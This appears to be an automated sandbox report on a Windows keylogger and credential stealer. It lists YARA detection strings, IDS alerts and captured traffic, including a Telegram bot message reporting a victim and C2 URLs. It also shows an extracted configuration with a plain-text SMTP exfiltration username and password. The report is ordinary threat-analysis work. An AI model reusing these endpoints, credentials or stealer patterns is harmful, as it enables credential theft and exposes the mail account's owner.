2.2.RegSvcs.exe.3080000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.3080000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.3080000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.3080000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ef2f:$a1: get_encryptedPassword 0x3ef03:$a2: get_encryptedUsername 0x3efc7:$a3: get_timePasswordChanged 0x3eedf:$a4: get_passwordField 0x3ef45:$a5: set_encryptedPassword 0x3ed12:$a7: get_logins 0x3a370:$a10: KeyLoggerEventArgs 0x3a33f:$a11: KeyLoggerEventArgsEventHandler 0x3ede6:$a13: _encryptedPassword
2.2.RegSvcs.exe.3080000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a0b0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49753:$a3: \Google\Chrome\User Data\Default\Login Data 0x499b0:$a4: \Orbitum\User Data\Default\Login Data 0x4a38f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.3080000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3cae2:$s1: UnHook 0x3ca7e:$s2: SetHook 0x3cab7:$s3: CallNextHook 0x3ca46:$s4: _hook
2.2.RegSvcs.exe.55b0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.55b0000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.55b0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.55b0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.55b0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.55b0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e047:$a1: get_encryptedPassword 0x3e01b:$a2: get_encryptedUsername 0x3e0df:$a3: get_timePasswordChanged 0x3dff7:$a4: get_passwordField 0x3e05d:$a5: set_encryptedPassword 0x3de2a:$a7: get_logins 0x39488:$a10: KeyLoggerEventArgs 0x39457:$a11: KeyLoggerEventArgsEventHandler 0x3defe:$a13: _encryptedPassword
2.2.RegSvcs.exe.55b0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x491c8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4886b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48ac8:$a4: \Orbitum\User Data\Default\Login Data 0x494a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.55b0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3bbfa:$s1: UnHook 0x3bb96:$s2: SetHook 0x3bbcf:$s3: CallNextHook 0x3bb5e:$s4: _hook
2.2.RegSvcs.exe.2ec99b6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ec99b6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d12f:$a1: get_encryptedPassword 0x3d103:$a2: get_encryptedUsername 0x3d1c7:$a3: get_timePasswordChanged 0x3d0df:$a4: get_passwordField 0x3d145:$a5: set_encryptedPassword 0x3cf12:$a7: get_logins 0x38570:$a10: KeyLoggerEventArgs 0x3853f:$a11: KeyLoggerEventArgsEventHandler 0x3cfe6:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ec99b6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x482b0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47953:$a3: \Google\Chrome\User Data\Default\Login Data 0x47bb0:$a4: \Orbitum\User Data\Default\Login Data 0x4858f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ec99b6.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3ace2:$s1: UnHook 0x3ac7e:$s2: SetHook 0x3acb7:$s3: CallNextHook 0x3ac46:$s4: _hook
Click to see the 73 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 166.62.28.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4148, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49853

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:59:59.456700+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-11T03:00:00.579448+0100	2803305	3	Unknown Traffic	192.168.2.5	49708	104.21.80.1	443	TCP
2025-01-11T03:00:10.532782+0100	2803305	3	Unknown Traffic	192.168.2.5	49712	104.21.80.1	443	TCP
2025-01-11T03:00:19.715554+0100	2803305	3	Unknown Traffic	192.168.2.5	49755	104.21.80.1	443	TCP
2025-01-11T03:00:26.630399+0100	2803305	3	Unknown Traffic	192.168.2.5	49791	104.21.80.1	443	TCP
2025-01-11T03:00:27.702501+0100	2803305	3	Unknown Traffic	192.168.2.5	49799	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:59:57.729619+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-11T02:59:58.870174+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2025-01-11T02:59:59.995156+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:00:29.940565+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49812	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.55b0000.5.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sales@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: n0nsAzvYNd.exe	Virustotal: Detection: 67%			Perma Link
Source: n0nsAzvYNd.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: n0nsAzvYNd.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: n0nsAzvYNd.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: n0nsAzvYNd.exe, 00000000.00000003.2050473496.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000003.2052416082.0000000003410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: n0nsAzvYNd.exe, 00000000.00000003.2050473496.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000003.2052416082.0000000003410000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0040445A
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040C6D1 FindFirstFileW,FindClose,	0_2_0040C6D1
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0040C75C
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0040EF95
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0040F0F2
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0040F3F3
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_004037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004037EF
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00403B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00403B12
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0040BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_02D7DEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0566E4C5h	2_2_0566E514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0566F781h	2_2_0566F4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0566E4C5h	2_2_0566E307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0566FBD9h	2_2_0566F924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_0566E9E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49812 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.RegSvcs.exe.2ec99b6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2eca89e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.55b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49853 -> 166.62.28.135:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2012/01/2025%20/%2014:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 166.62.28.135 166.62.28.135
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49791 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49799 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49853 -> 166.62.28.135:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_004122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004122EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2012/01/2025%20/%2014:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.starofseasmarine.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 02:00:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/s
Source: RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
Source: RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
Source: RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
Source: RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.starofseasmarine.com
Source: RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: RegSvcs.exe, 00000002.00000002.4519152323.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0;
Source: RegSvcs.exe, 00000002.00000002.4518958149.0000000005AC8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4512068209.0000000001095000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: RegSvcs.exe, 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
